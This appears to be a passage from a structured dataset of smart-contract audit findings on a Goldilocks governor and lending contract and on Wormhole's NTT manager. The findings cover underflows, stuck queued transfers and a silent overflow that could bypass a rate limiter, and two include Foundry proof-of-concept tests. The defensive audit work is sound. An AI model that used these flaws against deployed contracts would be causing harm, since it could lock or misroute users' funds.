Error;\\n```\\nчA proposer can't cancel his proposal unless he decreases his voting power.ч```\\n function cancel(uint256 proposalId) external {\\n if(_getProposalState(proposalId) == ProposalState.Executed) revert InvalidProposalState();\\n Proposal storage proposal = proposals[proposalId];\\n if(msg.sender != proposal.proposer) revert NotProposer();\\n if(GovLocks(govlocks).getPriorVotes(proposal.proposer, block.number - 1) > proposalThreshold) revert AboveThreshold(); //@audit incorrect\\n proposal.cancelled = true;\\n uint256 targetsLength = proposal.targets.length;\\n for (uint256 i = 0; i < targetsLength; i++) {\\n Timelock(timelock).cancelTransaction(proposal.targets[i], proposal.eta, proposal.values[i], proposal.calldatas[i], proposal.signatures[i]);\\n }\\n emit ProposalCanceled(proposalId);\\n }\\n```\\n -Users wouldn't cancel their proposals due to the increased `proposalThreshold`.чmediumчWhen users call `cancel()`, it validates the caller's voting power with `proposalThreshold` which can be changed using `setProposalThreshold()`.\\n```\\n function setProposalThreshold(uint256 newProposalThreshold) external {\\n if(msg.sender != multisig) revert NotMultisig();\\n if(newProposalThreshold < MIN_PROPOSAL_THRESHOLD || newProposalThreshold > MAX_PROPOSAL_THRESHOLD) revert InvalidVotingParameter();\\n uint256 oldProposalThreshold = proposalThreshold;\\n proposalThreshold = newProposalThreshold;\\n emit ProposalThresholdSet(oldProposalThreshold, proposalThreshold);\\n }\\n```\\n\\nHere is a possible scenario.\\nLet's assume `proposalThreshold` = 100 and a user has 100 voting power.\\nThe user has proposed a proposal using `propose()`.\\nAfter that, `proposalThreshold` was increased to 150 by `multisig`.\\nWhen the user calls `cancel()`, it will revert as he doesn't have enough voting power.чIt would be good to cache `proposalThreshold` as a proposal state.чUsers wouldn't cancel their proposals due to the increased `proposalThreshold`.ч```\\n function setProposalThreshold(uint256 newProposalThreshold) external {\\n if(msg.sender != multisig) revert NotMultisig();\\n if(newProposalThreshold < MIN_PROPOSAL_THRESHOLD || newProposalThreshold > MAX_PROPOSAL_THRESHOLD) revert InvalidVotingParameter();\\n uint256 oldProposalThreshold = proposalThreshold;\\n proposalThreshold = newProposalThreshold;\\n emit ProposalThresholdSet(oldProposalThreshold, proposalThreshold);\\n }\\n```\\n -`Goldilend.liquidate()` might revert due to underflowчmediumчIn `repay()`, there would be a rounding during the `interest` calculation.\\n```\\n function repay(uint256 repayAmount, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(userLoan.borrowedAmount < repayAmount) revert ExcessiveRepay();\\n if(block.timestamp > userLoan.endDate) revert LoanExpired();\\n uint256 interestLoanRatio = FixedPointMathLib.divWad(userLoan.interest, userLoan.borrowedAmount);\\nL425 uint256 interest = FixedPointMathLib.mulWadUp(repayAmount, interestLoanRatio); //@audit rounding issue\\n outstandingDebt -= repayAmount - interest > outstandingDebt ? outstandingDebt : repayAmount - interest;\\n // rest of code\\n }\\n// rest of code\\n function liquidate(address user, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(block.timestamp < userLoan.endDate || userLoan.liquidated || userLoan.borrowedAmount == 0) revert Unliquidatable();\\n loans[user][_userLoanId].liquidated = true;\\n loans[user][_userLoanId].borrowedAmount = 0;\\nL448 outstandingDebt -= userLoan.borrowedAmount - userLoan.interest;\\n // rest of code\\n }\\n```\\n\\nHere is a possible scenario.\\nThere are 2 borrowers of `borrowedAmount = 100, `interest` = 10`. And `outstandingDebt = 2 * (100 - 10) = 180`.\\nThe first borrower calls `repay()` with `repayAmount = 100`.\\nDue to the rounding issue at L425, `interest` is 9 instead of 10. And `outstandingDebt = 180 - (100 - 9) = 89`.\\nIn `liquidate()` for the second borrower, it will revert at L448 because `outstandingDebt = 89 < borrowedAmount - `interest` = 90`.чIn `liquidate()`, `outstandingDebt` should be updated like the below.\\n```\\n /// @inheritdoc IGoldilend\\n function liquidate(address user, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(block.timestamp < userLoan.endDate || userLoan.liquidated || userLoan.borrowedAmount == 0) revert Unliquidatable();\\n loans[user][_userLoanId].liquidated = true;\\n loans[user][_userLoanId].borrowedAmount = 0;\\n// Add the line below\\n uint256 debtToRepay = userLoan.borrowedAmount - userLoan.interest;\\n// Add the line below\\n outstandingDebt -= debtToRepay > outstandingDebt ? outstandingDebt : debtToRepay;\\n // rest of code\\n }\\n```\\nч`liquidate()` might revert due to underflow.ч```\\n function repay(uint256 repayAmount, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(userLoan.borrowedAmount < repayAmount) revert ExcessiveRepay();\\n if(block.timestamp > userLoan.endDate) revert LoanExpired();\\n uint256 interestLoanRatio = FixedPointMathLib.divWad(userLoan.interest, userLoan.borrowedAmount);\\nL425 uint256 interest = FixedPointMathLib.mulWadUp(repayAmount, interestLoanRatio); //@audit rounding issue\\n outstandingDebt -= repayAmount - interest > outstandingDebt ? outstandingDebt : repayAmount - interest;\\n // rest of code\\n }\\n// rest of code\\n function liquidate(address user, uint256 _userLoanId) external {\\n Loan memory userLoan = loans[msg.sender][_userLoanId];\\n if(block.timestamp < userLoan.endDate || userLoan.liquidated || userLoan.borrowedAmount == 0) revert Unliquidatable();\\n loans[user][_userLoanId].liquidated = true;\\n loans[user][_userLoanId].borrowedAmount = 0;\\nL448 outstandingDebt -= userLoan.borrowedAmount - userLoan.interest;\\n // rest of code\\n }\\n```\\n -In `Goldigovernor`, wrong assumption of block timeчmediumчIn `Goldigovernor.sol`, voting period/delay limits are set with 15s block time.\\n```\\n /// @notice Minimum voting period\\n uint32 public constant MIN_VOTING_PERIOD = 5760; // About 24 hours\\n\\n /// @notice Maximum voting period\\n uint32 public constant MAX_VOTING_PERIOD = 80640; // About 2 weeks\\n\\n /// @notice Minimum voting delay\\n uint32 public constant MIN_VOTING_DELAY = 1;\\n\\n /// @notice Maximum voting delay\\n uint32 public constant MAX_VOTING_DELAY = 40320; // About 1 week\\n```\\n\\nBut Berachain has 5s block time according to its documentation.\\n```\\nBerachain has the following properties:\\n\\n- Block time: 5s\\n```\\n\\nSo these limits will be set shorter than expected.чWe should calculate these limits with 5s block time.чVoting period/delay limits will be set shorter than expected.ч```\\n /// @notice Minimum voting period\\n uint32 public constant MIN_VOTING_PERIOD = 5760; // About 24 hours\\n\\n /// @notice Maximum voting period\\n uint32 public constant MAX_VOTING_PERIOD = 80640; // About 2 weeks\\n\\n /// @notice Minimum voting delay\\n uint32 public constant MIN_VOTING_DELAY = 1;\\n\\n /// @notice Maximum voting delay\\n uint32 public constant MAX_VOTING_DELAY = 40320; // About 1 week\\n```\\n -Queued transfers can become stuck on the source chain if Transceiver instructions are encoded in the incorrect orderчhighчIn the case of multiple Transceivers, the current logic expects that a sender encodes Transceiver instructions in order of increasing Transceiver registration index, as validated in `TransceiverStructs::parseTransceiverInstructions`. Under normal circumstances, this logic works as expected, and the transaction fails when the user packs transceiver instructions in the incorrect order.\\n```\\n/* snip */\\nfor (uint256 i = 0; i < instructionsLength; i++) {\\n TransceiverInstruction memory instruction;\\n (instruction, offset) = parseTransceiverInstructionUnchecked(encoded, offset);\\n\\n uint8 instructionIndex = instruction.index;\\n\\n // The instructions passed in have to be strictly increasing in terms of transceiver index\\n if (i != 0 && instructionIndex <= lastIndex) {\\n revert UnorderedInstructions();\\n }\\n lastIndex = instructionIndex;\\n\\n instructions[instructionIndex] = instruction;\\n}\\n/* snip */\\n```\\n\\nHowever, this requirement on the order of Transceiver indices is not checked when transfers are initially queued for delayed execution. As a result, a transaction where this is the case will fail when the user calls `NttManager::completeOutboundQueuedTransfer` to execute a queued transfer.чWhen the transfer amount exceeds the current outbound capacity, verify the Transceiver instructions are ordered correctly before adding a message to the list of queued transfers.чThe sender's funds are transferred to the NTT Manager when messages are queued. However, this queued message can never be executed if the Transceiver indices are incorrectly ordered and, as a result, the user funds remain stuck in the NTT Manager.\\nProof of Concept: Run the following test:\\n```\\ncontract TestWrongTransceiverOrder is Test, INttManagerEvents, IRateLimiterEvents {\\n NttManager nttManagerChain1;\\n NttManager nttManagerChain2;\\n\\n using TrimmedAmountLib for uint256;\\n using TrimmedAmountLib for TrimmedAmount;\\n\\n uint16 constant chainId1 = 7;\\n uint16 constant chainId2 = 100;\\n uint8 constant FAST_CONSISTENCY_LEVEL = 200;\\n uint256 constant GAS_LIMIT = 500000;\\n\\n uint16 constant SENDING_CHAIN_ID = 1;\\n uint256 constant DEVNET_GUARDIAN_PK =\\n 0xcfb12303a19cde580bb4dd771639b0d26bc68353645571a8cff516ab2ee113a0;\\n WormholeSimulator guardian;\\n uint256 initialBlockTimestamp;\\n\\n WormholeTransceiver wormholeTransceiverChain1;\\n WormholeTransceiver wormholeTransceiver2Chain1;\\n\\n WormholeTransceiver wormholeTransceiverChain2;\\n address userA = address(0x123);\\n address userB = address(0x456);\\n address userC = address(0x789);\\n address userD = address(0xABC);\\n\\n address relayer = address(0x28D8F1Be96f97C1387e94A53e00eCcFb4E75175a);\\n IWormhole wormhole = IWormhole(0x706abc4E45D419950511e474C7B9Ed348A4a716c);\\n\\n function setUp() public {\\n string memory url = \"https://goerli.blockpi.network/v1/rpc/public\";\\n vm.createSelectFork(url);\\n initialBlockTimestamp = vm.getBlockTimestamp();\\n\\n guardian = new WormholeSimulator(address(wormhole), DEVNET_GUARDIAN_PK);\\n\\n vm.chainId(chainId1);\\n DummyToken t1 = new DummyToken();\\n NttManager implementation =\\n new MockNttManagerContract(address(t1), INttManager.Mode.LOCKING, chainId1, 1 days);\\n\\n nttManagerChain1 =\\n MockNttManagerContract(address(new ERC1967Proxy(address(implementation), \"\")));\\n nttManagerChain1.initialize();\\n\\n WormholeTransceiver wormholeTransceiverChain1Implementation = new MockWormholeTransceiverContract(\\n address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiverChain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation), \"\"))\\n );\\n\\n WormholeTransceiver wormholeTransceiverChain1Implementation2 = new MockWormholeTransceiverContract(\\n address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiver2Chain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation2), \"\"))\\n );\\n\\n\\n // Actually initialize properly now\\n wormholeTransceiverChain1.initialize();\\n wormholeTransceiver2Chain1.initialize();\\n\\n\\n nttManagerChain1.setTransceiver(address(wormholeTransceiverChain1));\\n nttManagerChain1.setTransceiver(address(wormholeTransceiver2Chain1));\\n nttManagerChain1.setOutboundLimit(type(uint64).max);\\n nttManagerChain1.setInboundLimit(type(uint64).max, chainId2);\\n\\n // Chain 2 setup\\n vm.chainId(chainId2);\\n DummyToken t2 = new DummyTokenMintAndBurn();\\n NttManager implementationChain2 =\\n new MockNttManagerContract(address(t2), INttManager.Mode.BURNING, chainId2, 1 days);\\n\\n nttManagerChain2 =\\n MockNttManagerContract(address(new ERC1967Proxy(address(implementationChain2), \"\")));\\n nttManagerChain2.initialize();\\n\\n WormholeTransceiver wormholeTransceiverChain2Implementation = new MockWormholeTransceiverContract(\\n address(nttManagerChain2),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n\\n wormholeTransceiverChain2 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain2Implementation), \"\"))\\n );\\n wormholeTransceiverChain2.initialize();\\n\\n nttManagerChain2.setTransceiver(address(wormholeTransceiverChain2));\\n nttManagerChain2.setOutboundLimit(type(uint64).max);\\n nttManagerChain2.setInboundLimit(type(uint64).max, chainId1);\\n\\n // Register peer contracts for the nttManager and transceiver. Transceivers and nttManager each have the concept of peers here.\\n nttManagerChain1.setPeer(chainId2, bytes32(uint256(uint160(address(nttManagerChain2)))), 9);\\n nttManagerChain2.setPeer(chainId1, bytes32(uint256(uint160(address(nttManagerChain1)))), 7);\\n\\n // Set peers for the transceivers\\n wormholeTransceiverChain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n wormholeTransceiver2Chain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n wormholeTransceiverChain2.setWormholePeer(\\n chainId1, bytes32(uint256(uint160(address(wormholeTransceiverChain1))))\\n );\\n\\n require(nttManagerChain1.getThreshold() != 0, \"Threshold is zero with active transceivers\");\\n\\n // Actually set it\\n nttManagerChain1.setThreshold(2);\\n nttManagerChain2.setThreshold(1);\\n }\\n\\n function testWrongTransceiverOrder() external {\\n vm.chainId(chainId1);\\n\\n // Setting up the transfer\\n DummyToken token1 = DummyToken(nttManagerChain1.token());\\n uint8 decimals = token1.decimals();\\n\\n token1.mintDummy(address(userA), 5 * 10 ** decimals);\\n uint256 outboundLimit = 4 * 10 ** decimals;\\n nttManagerChain1.setOutboundLimit(outboundLimit);\\n\\n vm.startPrank(userA);\\n\\n uint256 transferAmount = 5 * 10 ** decimals;\\n token1.approve(address(nttManagerChain1), transferAmount);\\n\\n // transfer with shouldQueue == true\\n uint64 qSeq = nttManagerChain1.transfer(\\n transferAmount, chainId2, toWormholeFormat(userB), true, encodeTransceiverInstructionsJumbled(true)\\n );\\n\\n assertEq(qSeq, 0);\\n IRateLimiter.OutboundQueuedTransfer memory qt = nttManagerChain1.getOutboundQueuedTransfer(0);\\n assertEq(qt.amount.getAmount(), transferAmount.trim(decimals, decimals).getAmount());\\n assertEq(qt.recipientChain, chainId2);\\n assertEq(qt.recipient, toWormholeFormat(userB));\\n assertEq(qt.txTimestamp, initialBlockTimestamp);\\n\\n // assert that the contract also locked funds from the user\\n assertEq(token1.balanceOf(address(userA)), 0);\\n assertEq(token1.balanceOf(address(nttManagerChain1)), transferAmount);\\n\\n // elapse rate limit duration - 1\\n uint256 durationElapsedTime = initialBlockTimestamp + nttManagerChain1.rateLimitDuration();\\n\\n vm.warp(durationElapsedTime);\\n\\n vm.expectRevert(0x71f23ef2); //UnorderedInstructions() selector\\n nttManagerChain1.completeOutboundQueuedTransfer(0);\\n }\\n\\n // Encode an instruction for each of the relayers\\n function encodeTransceiverInstructionsJumbled(bool relayer_off) public view returns (bytes memory) {\\n WormholeTransceiver.WormholeTransceiverInstruction memory instruction =\\n IWormholeTransceiver.WormholeTransceiverInstruction(relayer_off);\\n\\n bytes memory encodedInstructionWormhole =\\n wormholeTransceiverChain1.encodeWormholeTransceiverInstruction(instruction);\\n\\n TransceiverStructs.TransceiverInstruction memory TransceiverInstruction1 =\\n TransceiverStructs.TransceiverInstruction({index: 0, payload: encodedInstructionWormhole});\\n TransceiverStructs.TransceiverInstruction memory TransceiverInstruction2 =\\n TransceiverStructs.TransceiverInstruction({index: 1, payload: encodedInstructionWormhole});\\n\\n TransceiverStructs.TransceiverInstruction[] memory TransceiverInstructions =\\n new TransceiverStructs.TransceiverInstruction[](2);\\n\\n TransceiverInstructions[0] = TransceiverInstruction2;\\n TransceiverInstructions[1] = TransceiverInstruction1;\\n\\n return TransceiverStructs.encodeTransceiverInstructions(TransceiverInstructions);\\n }\\n}\\n```\\nч```\\n/* snip */\\nfor (uint256 i = 0; i < instructionsLength; i++) {\\n TransceiverInstruction memory instruction;\\n (instruction, offset) = parseTransceiverInstructionUnchecked(encoded, offset);\\n\\n uint8 instructionIndex = instruction.index;\\n\\n // The instructions passed in have to be strictly increasing in terms of transceiver index\\n if (i != 0 && instructionIndex <= lastIndex) {\\n revert UnorderedInstructions();\\n }\\n lastIndex = instructionIndex;\\n\\n instructions[instructionIndex] = instruction;\\n}\\n/* snip */\\n```\\n -Queued transfers can become stuck on the source chain if new Transceivers are added or existing Transceivers are modified before completionчhighчWhen a sender transfers an amount that exceeds the current outbound capacity, such transfers are sent to a queue for delayed execution within `NttManager::_transferEntrypoint`. The rate limit duration is defined as an immutable variable determining the temporal lag between queueing and execution, with a typical rate limit duration being 24 hours.\\n```\\n/* snip */\\n// now check rate limits\\nbool isAmountRateLimited = _isOutboundAmountRateLimited(internalAmount);\\nif (!shouldQueue && isAmountRateLimited) {\\n revert NotEnoughCapacity(getCurrentOutboundCapacity(), amount);\\n}\\nif (shouldQueue && isAmountRateLimited) {\\n // emit an event to notify the user that the transfer is rate limited\\n emit OutboundTransferRateLimited(\\n msg.sender, sequence, amount, getCurrentOutboundCapacity()\\n );\\n\\n // queue up and return\\n _enqueueOutboundTransfer(\\n sequence,\\n trimmedAmount,\\n recipientChain,\\n recipient,\\n msg.sender,\\n transceiverInstructions\\n );\\n\\n // refund price quote back to sender\\n _refundToSender(msg.value);\\n\\n // return the sequence in the queue\\n return sequence;\\n}\\n/* snip */\\n```\\n\\nIn the event that new Transceivers are added or existing Transceivers are removed from the NTT Manager, any pending queued transfers within the rate limit duration can potentially revert. This is because senders might not have correctly packed the Transceiver instructions for a given Transceiver based on the new configuration, and a missing Transceiver instruction can potentially cause an array index out-of-bounds exception while calculating the delivery price when the instructions are finally parsed. For example, if there are initially two Transceivers but an additional Transceiver is added while the transfer is rate-limited, the instructions array as shown below will be declared with a length of three, corresponding to the new number of enabled Transceivers; however, the transfer will have only encoded two Transceiver instructions based on the configuration at the time it was initiated.\\n```\\nfunction parseTransceiverInstructions(\\n bytes memory encoded,\\n uint256 numEnabledTransceivers\\n) public pure returns (TransceiverInstruction[] memory) {\\n uint256 offset = 0;\\n uint256 instructionsLength;\\n (instructionsLength, offset) = encoded.asUint8Unchecked(offset);\\n\\n // We allocate an array with the length of the number of enabled transceivers\\n // This gives us the flexibility to not have to pass instructions for transceivers that\\n // don't need them\\n TransceiverInstruction[] memory instructions =\\n new TransceiverInstruction[](numEnabledTransceivers);\\n\\n uint256 lastIndex = 0;\\n for (uint256 i = 0; i < instructionsLength; i++) {\\n TransceiverInstruction memory instruction;\\n (instruction, offset) = parseTransceiverInstructionUnchecked(encoded, offset);\\n\\n uint8 instructionIndex = instruction.index;\\n\\n // The instructions passed in have to be strictly increasing in terms of transceiver index\\n if (i != 0 && instructionIndex <= lastIndex) {\\n revert UnorderedInstructions();\\n }\\n lastIndex = instructionIndex;\\n\\n instructions[instructionIndex] = instruction;\\n }\\n\\n encoded.checkLength(offset);\\n\\n return instructions;\\n}\\n```\\nчConsider passing no instructions into the delivery price estimation when the Transceiver index does not exist.чMissing Transceiver instructions prevents the total delivery price for the corresponding message from being calculated. This prevents any queued Transfers from being executed with the current list of transceivers. As a result, underlying sender funds will be stuck in the `NttManager` contract. Note that a similar issue occurs if the peer NTT manager contract is updated on the destination (say, after a redeployment on the source chain) before an in-flight attestation is received and executed, reverting with an invalid peer error.\\nProof of Concept: Run the following test:\\n```\\ncontract TestTransceiverModification is Test, INttManagerEvents, IRateLimiterEvents {\\n NttManager nttManagerChain1;\\n NttManager nttManagerChain2;\\n\\n using TrimmedAmountLib for uint256;\\n using TrimmedAmountLib for TrimmedAmount;\\n\\n uint16 constant chainId1 = 7;\\n uint16 constant chainId2 = 100;\\n uint8 constant FAST_CONSISTENCY_LEVEL = 200;\\n uint256 constant GAS_LIMIT = 500000;\\n\\n uint16 constant SENDING_CHAIN_ID = 1;\\n uint256 constant DEVNET_GUARDIAN_PK =\\n 0xcfb12303a19cde580bb4dd771639b0d26bc68353645571a8cff516ab2ee113a0;\\n WormholeSimulator guardian;\\n uint256 initialBlockTimestamp;\\n\\n WormholeTransceiver wormholeTransceiverChain1;\\n WormholeTransceiver wormholeTransceiver2Chain1;\\n WormholeTransceiver wormholeTransceiver3Chain1;\\n\\n WormholeTransceiver wormholeTransceiverChain2;\\n address userA = address(0x123);\\n address userB = address(0x456);\\n address userC = address(0x789);\\n address userD = address(0xABC);\\n\\n address relayer = address(0x28D8F1Be96f97C1387e94A53e00eCcFb4E75175a);\\n IWormhole wormhole = IWormhole(0x706abc4E45D419950511e474C7B9Ed348A4a716c);\\n\\n function setUp() public {\\n string memory url = \"https://goerli.blockpi.network/v1/rpc/public\";\\n vm.createSelectFork(url);\\n initialBlockTimestamp = vm.getBlockTimestamp();\\n\\n guardian = new WormholeSimulator(address(wormhole), DEVNET_GUARDIAN_PK);\\n\\n vm.chainId(chainId1);\\n DummyToken t1 = new DummyToken();\\n NttManager implementation =\\n new MockNttManagerContract(address(t1), INttManager.Mode.LOCKING, chainId1, 1 days);\\n\\n nttManagerChain1 =\\n MockNttManagerContract(address(new ERC1967Proxy(address(implementation), \"\")));\\n nttManagerChain1.initialize();\\n\\n // transceiver 1\\n WormholeTransceiver wormholeTransceiverChain1Implementation = new MockWormholeTransceiverContract(\\n address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiverChain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation), \"\"))\\n );\\n\\n // transceiver 2\\n WormholeTransceiver wormholeTransceiverChain1Implementation2 = new MockWormholeTransceiverContract(\\n address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiver2Chain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation2), \"\"))\\n );\\n\\n // transceiver 3\\n WormholeTransceiver wormholeTransceiverChain1Implementation3 = new MockWormholeTransceiverContract(\\n address(nttManagerChain1),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n wormholeTransceiver3Chain1 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain1Implementation3), \"\"))\\n );\\n\\n\\n // Actually initialize properly now\\n wormholeTransceiverChain1.initialize();\\n wormholeTransceiver2Chain1.initialize();\\n wormholeTransceiver3Chain1.initialize();\\n\\n\\n nttManagerChain1.setTransceiver(address(wormholeTransceiverChain1));\\n nttManagerChain1.setTransceiver(address(wormholeTransceiver2Chain1));\\n\\n // third transceiver is NOT set at this point for nttManagerChain1\\n nttManagerChain1.setOutboundLimit(type(uint64).max);\\n nttManagerChain1.setInboundLimit(type(uint64).max, chainId2);\\n\\n // Chain 2 setup\\n vm.chainId(chainId2);\\n DummyToken t2 = new DummyTokenMintAndBurn();\\n NttManager implementationChain2 =\\n new MockNttManagerContract(address(t2), INttManager.Mode.BURNING, chainId2, 1 days);\\n\\n nttManagerChain2 =\\n MockNttManagerContract(address(new ERC1967Proxy(address(implementationChain2), \"\")));\\n nttManagerChain2.initialize();\\n\\n WormholeTransceiver wormholeTransceiverChain2Implementation = new MockWormholeTransceiverContract(\\n address(nttManagerChain2),\\n address(wormhole),\\n address(relayer),\\n address(0x0),\\n FAST_CONSISTENCY_LEVEL,\\n GAS_LIMIT\\n );\\n\\n wormholeTransceiverChain2 = MockWormholeTransceiverContract(\\n address(new ERC1967Proxy(address(wormholeTransceiverChain2Implementation), \"\"))\\n );\\n wormholeTransceiverChain2.initialize();\\n\\n nttManagerChain2.setTransceiver(address(wormholeTransceiverChain2));\\n nttManagerChain2.setOutboundLimit(type(uint64).max);\\n nttManagerChain2.setInboundLimit(type(uint64).max, chainId1);\\n\\n // Register peer contracts for the nttManager and transceiver. Transceivers and nttManager each have the concept of peers here.\\n nttManagerChain1.setPeer(chainId2, bytes32(uint256(uint160(address(nttManagerChain2)))), 9);\\n nttManagerChain2.setPeer(chainId1, bytes32(uint256(uint160(address(nttManagerChain1)))), 7);\\n\\n // Set peers for the transceivers\\n wormholeTransceiverChain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n wormholeTransceiver2Chain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n wormholeTransceiver3Chain1.setWormholePeer(\\n chainId2, bytes32(uint256(uint160(address(wormholeTransceiverChain2))))\\n );\\n\\n\\n wormholeTransceiverChain2.setWormholePeer(\\n chainId1, bytes32(uint256(uint160(address(wormholeTransceiverChain1))))\\n );\\n\\n\\n require(nttManagerChain1.getThreshold() != 0, \"Threshold is zero with active transceivers\");\\n\\n // Actually set it\\n nttManagerChain1.setThreshold(2);\\n nttManagerChain2.setThreshold(1);\\n }\\n\\n function testTransceiverModification() external {\\n vm.chainId(chainId1);\\n\\n // Setting up the transfer\\n DummyToken token1 = DummyToken(nttManagerChain1.token());\\n uint8 decimals = token1.decimals();\\n\\n token1.mintDummy(address(userA), 5 * 10 ** decimals);\\n uint256 outboundLimit = 4 * 10 ** decimals;\\n nttManagerChain1.setOutboundLimit(outboundLimit);\\n\\n vm.startPrank(userA);\\n\\n uint256 transferAmount = 5 * 10 ** decimals;\\n token1.approve(address(nttManagerChain1), transferAmount);\\n\\n // transfer with shouldQueue == true\\n uint64 qSeq = nttManagerChain1.transfer(\\n transferAmount, chainId2, toWormholeFormat(userB), true, encodeTransceiverInstructions(true)\\n );\\n vm.stopPrank();\\n\\n assertEq(qSeq, 0);\\n IRateLimiter.OutboundQueuedTransfer memory qt = nttManagerChain1.getOutboundQueuedTransfer(0);\\n assertEq(qt.amount.getAmount(), transferAmount.trim(decimals, decimals).getAmount());\\n assertEq(qt.recipientChain, chainId2);\\n assertEq(qt.recipient, toWormholeFormat(userB));\\n assertEq(qt.txTimestamp, initialBlockTimestamp);\\n\\n // assert that the contract also locked funds from the user\\n assertEq(token1.balanceOf(address(userA)), 0);\\n assertEq(token1.balanceOf(address(nttManagerChain1)), transferAmount);\\n\\n\\n // elapse some random time - 60 seconds\\n uint256 durationElapsedTime = initialBlockTimestamp + 60;\\n\\n // now add a third transceiver\\n nttManagerChain1.setTransceiver(address(wormholeTransceiver3Chain1));\\n\\n // verify that the third transceiver is added\\n assertEq(nttManagerChain1.getTransceivers().length, 3);\\n\\n // remove second transceiver\\n nttManagerChain1.removeTransceiver(address(wormholeTransceiver2Chain1));\\n\\n // verify that the second transceiver is removed\\n assertEq(nttManagerChain1.getTransceivers().length, 2);\\n\\n // elapse rate limit duration\\n durationElapsedTime = initialBlockTimestamp + nttManagerChain1.rateLimitDuration();\\n\\n vm.warp(durationElapsedTime);\\n\\n vm.expectRevert(stdError.indexOOBError); //index out of bounds - transceiver instructions array does not have a third element to access\\n nttManagerChain1.completeOutboundQueuedTransfer(0);\\n }\\n\\n // Encode an instruction for each of the relayers\\n function encodeTransceiverInstructions(bool relayer_off) public view returns (bytes memory) {\\n WormholeTransceiver.WormholeTransceiverInstruction memory instruction =\\n IWormholeTransceiver.WormholeTransceiverInstruction(relayer_off);\\n\\n bytes memory encodedInstructionWormhole =\\n wormholeTransceiverChain1.encodeWormholeTransceiverInstruction(instruction);\\n\\n TransceiverStructs.TransceiverInstruction memory TransceiverInstruction1 =\\n TransceiverStructs.TransceiverInstruction({index: 0, payload: encodedInstructionWormhole});\\n TransceiverStructs.TransceiverInstruction memory TransceiverInstruction2 =\\n TransceiverStructs.TransceiverInstruction({index: 1, payload: encodedInstructionWormhole});\\n\\n TransceiverStructs.TransceiverInstruction[] memory TransceiverInstructions =\\n new TransceiverStructs.TransceiverInstruction[](2);\\n\\n TransceiverInstructions[0] = TransceiverInstruction1;\\n TransceiverInstructions[1] = TransceiverInstruction2;\\n\\n return TransceiverStructs.encodeTransceiverInstructions(TransceiverInstructions);\\n }\\n}\\n```\\nч```\\n/* snip */\\n// now check rate limits\\nbool isAmountRateLimited = _isOutboundAmountRateLimited(internalAmount);\\nif (!shouldQueue && isAmountRateLimited) {\\n revert NotEnoughCapacity(getCurrentOutboundCapacity(), amount);\\n}\\nif (shouldQueue && isAmountRateLimited) {\\n // emit an event to notify the user that the transfer is rate limited\\n emit OutboundTransferRateLimited(\\n msg.sender, sequence, amount, getCurrentOutboundCapacity()\\n );\\n\\n // queue up and return\\n _enqueueOutboundTransfer(\\n sequence,\\n trimmedAmount,\\n recipientChain,\\n recipient,\\n msg.sender,\\n transceiverInstructions\\n );\\n\\n // refund price quote back to sender\\n _refundToSender(msg.value);\\n\\n // return the sequence in the queue\\n return sequence;\\n}\\n/* snip */\\n```\\n -Silent overflow in `TrimmedAmount::shift` could result in rate limiter being bypassedчmediumчWithin `TrimmedAmount::trim`, there is an explicit check that ensures the scaled amount does not exceed the maximum uint64:\\n```\\n// NOTE: amt after trimming must fit into uint64 (that's the point of\\n// trimming, as Solana only supports uint64 for token amts)\\nif (amountScaled > type(uint64).max) {\\n revert AmountTooLarge(amt);\\n}\\n```\\n\\nHowever, no such check exists within `TrimmedAmount::shift` which means there is potential for silent overflow when casting to `uint64` here:\\n```\\nfunction shift(\\n TrimmedAmount memory amount,\\n uint8 toDecimals\\n) internal pure returns (TrimmedAmount memory) {\\n uint8 actualToDecimals = minUint8(TRIMMED_DECIMALS, toDecimals);\\n return TrimmedAmount(\\n uint64(scale(amount.amount, amount.decimals, actualToDecimals)), actualToDecimals\\n );\\n}\\n```\\nчExplicitly check the scaled amount in `TrimmedAmount::shift` does not exceed the maximum `uint64`.чA silent overflow in `TrimmedAmount::shift` could result in the rate limiter being bypassed, considering its usage in `NttManager::_transferEntryPoint`. Given the high impact and reasonable likelihood of this issue occurring, it is classified a MEDIUM severity finding.ч```\\n// NOTE: amt after trimming must fit into uint64 (that's the point of\\n// trimming, as Solana only supports uint64 for token amts)\\nif (amountScaled > type(uint64).max) {\\n revert AmountTooLarge(amt);\\n}\\n```\\n -Disabled Transceivers cannot be re-enabled by calling 